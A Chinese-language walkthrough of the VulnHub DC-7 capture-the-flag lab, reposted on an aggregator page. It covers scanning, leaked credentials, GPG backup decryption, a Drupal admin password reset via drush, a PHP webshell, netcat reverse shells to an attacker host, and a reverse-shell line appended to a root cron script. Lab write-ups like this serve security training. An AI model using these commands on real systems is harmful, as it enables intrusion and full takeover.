您的位置:首页 > 汽车 > 时评 > 互联网广告代理商好做吗_seo用什么论坛引流_泰安网站制作推广_网络推广用什么软件好

互联网广告代理商好做吗_seo用什么论坛引流_泰安网站制作推广_网络推广用什么软件好

2024/11/17 12:56:34 来源:https://blog.csdn.net/weixin_46099552/article/details/143468665  浏览:    关键词:互联网广告代理商好做吗_seo用什么论坛引流_泰安网站制作推广_网络推广用什么软件好
互联网广告代理商好做吗_seo用什么论坛引流_泰安网站制作推广_网络推广用什么软件好

https://www.vulnhub.com/entry/dc-7,356/

端口扫描主机发现

  1. 探测存活主机,178是靶机

    nmap -sP 192.168.75.0/24                 
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 13:30 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00037s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00030s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.178
    Host is up (0.00049s latency).
    MAC Address: 00:0C:29:31:46:A0 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00037s latency).
    MAC Address: 00:50:56:FE:CA:7A (VMware)
    Nmap scan report for 192.168.75.151
    
  2. 探测主机所有开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.178
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 13:31 CST
    Nmap scan report for 192.168.75.178
    Host is up (0.00040s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:31:46:A0 (VMware)
    
  3. 探测服务版本以及系统版本

    nmap -sV -sT -O -p80,22 192.168.75.178     
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 13:32 CST
    Nmap scan report for 192.168.75.178
    Host is up (0.00049s latency).PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.25 ((Debian))
    MAC Address: 00:0C:29:31:46:A0 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p 80,22 192.168.75.178
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 13:33 CST
    Nmap scan report for 192.168.75.178
    Host is up (0.00073s latency).PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.178
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.75.178:80/
    |     Form id: search-block-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/user/login
    |     Form id: user-login-form
    |     Form action: /user/login
    |     
    |     Path: http://192.168.75.178:80/user/login
    |     Form id: search-block-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/search/node
    |     Form id: search-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/search/node
    |     Form id: search-block-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/user/login
    |     Form id: user-login-form
    |     Form action: /user/login
    |     
    |     Path: http://192.168.75.178:80/user/login
    |     Form id: search-block-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/user/password
    |     Form id: user-pass
    |     Form action: /user/password
    |     
    |     Path: http://192.168.75.178:80/user/password
    |     Form id: search-block-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/search/node
    |     Form id: search-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/search/node
    |     Form id: search-block-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/search/node/help
    |     Form id: search-block-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/search/node
    |     Form id: search-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/search/node
    |     Form id: search-block-form
    |     Form action: /search/node
    |     
    |     Path: http://192.168.75.178:80/search/node/
    |     Form id: search-form
    |     Form action: /search/node/
    |     
    |     Path: http://192.168.75.178:80/search/node/
    |     Form id: search-block-form
    |_    Form action: /search/node
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |   /rss.xml: RSS or Atom feed
    |   /robots.txt: Robots file
    |   /INSTALL.txt: Drupal file
    |   /: Drupal version 8 
    |_  /README.txt: Interesting, a readme.
    

web渗透

  1. 访问页面,发现是 DrupalCMS

    在这里插入图片描述

    
    Welcome to DC-7
    DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)
    While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.
    What you will have to do, is to think "outside" the box.
    Way "outside" the box.  :-)
    @DC7USER
    
  2. 爆破目录看看,好像没有什么实质性的东西

    dirsearch -u 192.168.75.178 -x 403,404
    //
    [13:53:16] Starting:                                                                                                                                                                                             
    [13:55:54] 301 -  315B  - /core  ->  http://192.168.75.178/core/            
    [13:56:39] 301 -  340B  - /forum/install/install.php  ->  http://192.168.75.178/forum/install/core/install.php
    [13:57:02] 200 -    3KB - /index.php                                        
    [13:57:06] 301 -  326B  - /install.php  ->  http://192.168.75.178/core/install.php
    [13:57:06] 301 -  342B  - /install.php?profile=default  ->  http://192.168.75.178/core/install.php?profile=default
    [13:57:07] 200 -  104B  - /INSTALL.txt                                      
    [13:57:23] 200 -    7KB - /LICENSE.txt                                      
    [13:57:52] 301 -  318B  - /modules  ->  http://192.168.75.178/modules/      
    [13:58:03] 200 -    3KB - /node                                             
    [13:58:04] 406 -   68B  - /node/1?_format=hal_json                          
    [13:58:40] 301 -  319B  - /profiles  ->  http://192.168.75.178/profiles/    
    [13:58:48] 200 -    2KB - /README.txt                                       
    [13:58:55] 200 -  584B  - /robots.txt                                       
    [13:59:00] 302 -  376B  - /search  ->  http://192.168.75.178/search/node    
    [13:59:00] 302 -  376B  - /Search  ->  http://192.168.75.178/search/node    
    [13:59:15] 301 -  316B  - /sites  ->  http://192.168.75.178/sites/          
    [13:59:16] 200 -  309B  - /sites/README.txt                                 
    [13:59:44] 301 -  317B  - /themes  ->  http://192.168.75.178/themes/        
    [13:59:57] 302 -  372B  - /user/  ->  http://192.168.75.178/user/login      
    [13:59:57] 302 -  372B  - /user  ->  http://192.168.75.178/user/login
    [13:59:59] 200 -    3KB - /user/login/                                      
    [14:00:19] 200 -    4KB - /web.config                                       
    [14:00:26] 301 -  335B  - /wp-admin/install.php  ->  http://192.168.75.178/wp-admin/core/install.php
    
  3. 把目录翻了半天没找到可利用的,在github找了针对于drupal的工具尝试

    https://github.com/immunIT/drupwn

            ____/ __ \_______  ______ _      ______/ / / / ___/ / / / __ \ | /| / / __ \/ /_/ / /  / /_/ / /_/ / |/ |/ / / / //_____/_/   \__,_/ .___/|__/|__/_/ /_//_/    
    [-] Version not specified, trying to identify it
    [+] Version detected: 8.0                                                                                                                                                                                        
    ============ Users ============
    [+]***** (id=1)
    [+]***** (id=2)
    ============ Default files ============
    [+] /README.txt (200)
    [+] /LICENSE.txt (200)
    [+] /robots.txt (200)
    [+] /web.config (200)
    [+] /update.php (403)
    [+] /install.php (200)
    ============ Nodes ============
    http://192.168.75.178/node/1
    http://192.168.75.178/node/3
    http://192.168.75.178/node/2
    

    结果也没啥用就是了

  4. 尝试弱口令,错误次数过多会被封禁

    Too many failed login attempts from your IP address. This IP address is temporarily blocked. Try again later or request a new password. 
    
  5. 想起作者说的话,虽然它是早期 DC 版本(我不会告诉你哪一个)的一种逻辑进展,但其中涉及一些新概念,但你需要自己弄清楚。😃 如果你需要诉诸暴力破解或字典攻击,你可能不会成功

    (而后我们尝试了暴力破解…)

    早期DC版本,DC-1也是Drupal但是版本都不一样,漏洞估计也被修复了

    没想法

  6. 看了下dalao们的WP,发现转折点在,页面底下的**@DC7USER** ,我们在GitHub搜索能搜索到

    https://github.com/Dc7User/staffdb

    是DC7的一些代码,下面还说

    This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge.This isn't a flag, btw, but if you have made it here, well done anyway. :-)
    

    不按套路出牌属实是。。。我们查看下数据库配置文件config.php ,获得数据库账号密码

    <?php$servername = "localhost";$username = "dc7user";$password = "MdR3xOgB7#dW";$dbname = "Staff";$conn = mysqli_connect($servername, $username, $password, $dbname);
    ?>
    

    尝试后发现ssh可以登陆上去

提权

  1. 查看权限

    dc7user@dc-7:~$ whoami
    dc7user
    dc7user@dc-7:~$ id
    uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
    dc7user@dc-7:~$ uname -a
    Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
    
  2. 查找敏感文件

    • 在当前home目录下存在mbox文件,内容好像还是定期备份之类的

      From root@dc-7 Fri Aug 30 03:15:17 2019
      Return-path: <root@dc-7>
      Envelope-to: root@dc-7
      Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
      Received: from root by dc-7 with local (Exim 4.89)(envelope-from <root@dc-7>)id 1i3O0y-0000Ed-Tofor root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
      From: root@dc-7 (Cron Daemon)
      To: root@dc-7
      Subject: Cron <root@dc-7> /opt/scripts/backups.sh
      MIME-Version: 1.0
      Content-Type: text/plain; charset=UTF-8
      Content-Transfer-Encoding: 8bit
      X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
      X-Cron-Env: <SHELL=/bin/sh>
      X-Cron-Env: <HOME=/root>
      X-Cron-Env: <LOGNAME=root>
      Message-Id: <E1i3O0y-0000Ed-To@dc-7>
      Date: Fri, 30 Aug 2019 03:15:17 +1000rm: cannot remove '/home/dc7user/backups/*': No such file or directory
      Database dump saved to /home/dc7user/backups/website.sql               [success]
      

      可以知道脚本在/opt/scripts/backups.sh

    • 并且当前目录下存在backups文件夹,里面是website.sql .GPGwebsite.tar.gz.gpg(GPG是加密文件)

  3. 查看/opt/scripts/backups.sh 文件

    #!/bin/bash
    rm /home/dc7user/backups/*
    cd /var/www/html/
    drush sql-dump --result-file=/home/dc7user/backups/website.sql
    cd ..
    tar -czf /home/dc7user/backups/website.tar.gz html/
    gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
    gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
    chown dc7user:dc7user /home/dc7user/backups/*
    rm /home/dc7user/backups/website.sql
    rm /home/dc7user/backups/website.tar.gz
    
    gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql 
    gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
    

    --pinentry-mode loopback:指定 GPG 使用命令行模式获取密码,而不是弹出窗口

    --passphrase PickYourOwnPassword:在此处直接提供密码(PickYourOwnPassword

    --symmetric:表示使用对称加密方法

    是进行对称加密,并且直接给出了密码PickYourOwnPassword

  4. 尝试解密,文件夹内两个文件都解密

    gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --output /home/dc7user/backups/website.sql --decrypt /home/dc7user/backups/website.sql.gpg
    gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --output /home/dc7user/backups/website.tar.gz --decrypt /home/dc7user/backups/website.tar.gz.gpg
    

    同样让 GPG 从命令行读取密码,使用加密时使用的密码,破解成功,并且收到一封邮件

    dc7user@dc-7:/opt/scripts$ gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --output /home/dc7user/backups/website.sql --decrypt /home/dc7user/backups/website.sql.gpg
    gpg: AES256 encrypted data
    gpg: encrypted with 1 passphraseYou have new mail in /var/mail/dc7user
    
  5. 我们先查看破解出来的文件,内容太多应该没用,返回去看邮件,像是之前mbox里的内容,然后再查看website.tar.gz ,解密后发现是整个HTML 的文件

    查看数据库配置文件settings.php ,其实在/var/www里面也能看(搞这么麻烦感觉走错路了)

      'username' => 'db7user','password' => 'yNv3Po00',
    
  6. 登录数据库成功,查询有用的数据

    MariaDB [d7db]> select * from users;
    +-----+--------------------------------------+----------+
    | uid | uuid                                 | langcode |
    +-----+--------------------------------------+----------+
    |   0 | e813638d-3eb3-4212-af40-171dd51023e9 | en       |
    |   1 | fd93872d-a854-44cd-bb08-eb9a11e46492 | en       |
    |   2 | 68803de9-fc7b-4b7b-bce8-d04f11ac4c8a | en       |
    +-----+--------------------------------------+----------+
    //
    MariaDB [d7db]> select * from users_field_data;
    +-----+----------+--------------------+--------------------------+---------+---------------------------------------------------------+-------------------+---------------------+--------+------------+------------+------------+------------+-------------------+------------------+
    | uid | langcode | preferred_langcode | preferred_admin_langcode | name    | pass                                                    | mail              | timezone            | status | created    | changed    | access     | login      | init              | default_langcode |
    +-----+----------+--------------------+--------------------------+---------+---------------------------------------------------------+-------------------+---------------------+--------+------------+------------+------------+------------+-------------------+------------------+
    |   0 | en       | en                 | NULL                     |         | NULL                                                    | NULL              |                     |      0 | 1567054076 | 1567054076 |          0 |          0 | NULL              |                1 |
    |   1 | en       | en                 | NULL                     | admin   | $S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F | admin@example.com | Australia/Melbourne |      1 | 1567054076 | 1567054076 | 1567098850 | 1567098643 | admin@example.com |                1 |
    |   2 | en       | en                 | en                       | dc7user | $S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI | dc7user@blah.com  | Australia/Brisbane  |      1 | 1567057938 | 1567057938 |          0 |          0 | dc7user@blah.com  |                1 |
    +-----+----------+--------------------+--------------------------+---------+---------------------------------------------------------+-------------------+---------------------+--------+------------+------------+------------+------------+-------------------+------------------+
    

    尝试将users_field_data 表的数据放到john爆破,没破解出来,寻找别的线索

  7. 仔细观察backups.sh 里面使用了drush 命令去读取数据库

    # 帮助信息
    dc7user@dc-7:/opt/scripts$ drush -h
    Drush provides an extensive help system that describes both drush commands and topics of general interest.  Use `drush help --filter` to present a list of command categories to view, and `drush topic` for a
    list of topics that go more in-depth on how to use and extend drush.Examples:drush                                     List all commands.                                     drush --filter=devel_generate             Show only commands defined in devel_generate.drush.inc drush help pm-download                    Show help for one command.                             drush help dl                             Show help for one command using an alias.              drush help --format=html                  Show an HTML page detailing all available commands.    drush help --format=json                  All available comamnds, in a machine parseable format.Arguments:command                                   A command name, or command alias.Options:--field-labels                            Add field labels before first line of data. Default is on; use --no-field-labels to disable.                               --fields=<name, description>              Fields to output. All available fields are: name, description.                                                             --filter=[category]                       Restrict command list to those commands defined in the specified file. Omit value to choose from a list of names.          --format=<json>                           Select output format. Available: table, csv, html, json, list, var_export, yaml. Default is table.                         --sort                                    Sort commands in alphabetical order. Drush waits for full bootstrap before printing any commands when this option is used.Topics:docs-readme                               README.md                                    docs-output-formats                       Output formatting options selection and use.
    

    查看一下文档 :https://drupalchina.gitbooks.io/begining-drupal8-cn/content/chapters/chapter-15.html

    找到 : user-password 为具有指定名称的用户账户设置或重置密码

    可以修改用户密码,可以尝试修改admin用户的密码

     drush user-password USERNAME --password="SOMEPASSWORD"
    

    修改成功,修改前记得切换目录到Drupal

    dc7user@dc-7:/var/www/html$ drush user-password admin --password="123456"
    Changed password for admin  
    

后台getshell

  1. 登陆后台,寻找可利用的点

    在这里插入图片描述

  2. 本来想直接修改**Welcome to DC-7** 的内容为一句话木马,但是发现没有解析,百度后知道Drupal为了安全将PHP独立为了一个模块,下面是模块链接🔗

    https://www.drupal.org/project/php

  3. 然后在Extend安装该拓展,前提是Update Manager安装了

    • 检查Update Manager 是否安装了

      在这里插入图片描述

    • 然后Extend 安装下载的拓展

      安装后选择 开启该模块

      在这里插入图片描述

  4. 安装完后,我们来到 Content 选项,选择**Welcome to DC-7** edit编辑

    在这里插入图片描述

    内容改为一句木马,然后内容格式化改为php ,然后保存

  5. 保存后复制页面链接使用蚁🗡连接,然后使用蚁🗡反弹shell

    (www-data:/var/www/html) $ nc 192.168.75.151 1234 -e /bin/bash
    

    获得www-datashell

    whoami
    www-data
    
  6. 我们知道backups.sh脚本属主为root,属组为www-data ,回到backups.sh的目录,将反弹shell语句插入脚本

    echo "nc 192.168.75.151 1233 -e /bin/bash" >> backups.sh
    

    插入后等待任务自动执行,就能获得root的权限了

    nc -lvp 1233
    listening on [any] 1233 ...id
    192.168.75.178: inverse host lookup failed: Unknown host
    connect to [192.168.75.151] from (UNKNOWN) [192.168.75.178] 54920
    uid=0(root) gid=0(root) groups=0(root)
    
  7. 读取flag文件

    # cat theflag.txt888       888          888 888      8888888b.                             888 888 888 888 
    888   o   888          888 888      888  "Y88b                            888 888 888 888 
    888  d8b  888          888 888      888    888                            888 888 888 888 
    888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
    888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
    88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
    8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
    888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 Congratulations!!!Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
    who have provided feedback, and all those who have taken the time to complete these little
    challenges.I'm sending out an especially big thanks to:@4nqr34z
    @D4mianWayne
    @0xmzfr
    @theart42If you enjoyed this CTF, send me a tweet via @DCAU7.
    

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com